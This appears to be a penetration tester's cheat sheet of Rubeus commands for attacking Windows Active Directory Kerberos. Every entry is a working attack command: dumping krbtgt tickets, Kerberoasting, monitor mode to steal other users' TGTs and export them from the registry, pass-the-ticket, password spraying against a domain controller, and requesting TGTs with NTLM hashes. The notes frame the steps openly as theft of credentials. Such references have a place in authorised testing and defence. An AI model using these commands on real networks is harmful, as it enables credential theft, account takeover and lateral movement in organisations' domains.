Rubeus.exe
Dump tickets
rubeus.exe dump /service:krbtgt /nowrap
Kerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
Monitor mode
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them.
Grab the TGTs from registry
reg export HKLM\SOFTWARE\MONITOR backup1.reg
Once you have the TGTs, use something like rubeus2ccache to convert to kirbi
or ccache
(reference). Then you can use rubeus to pass the TGT.
Pass-the-ticket
rubeus.exe ptt /ticket:xxx
Password spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap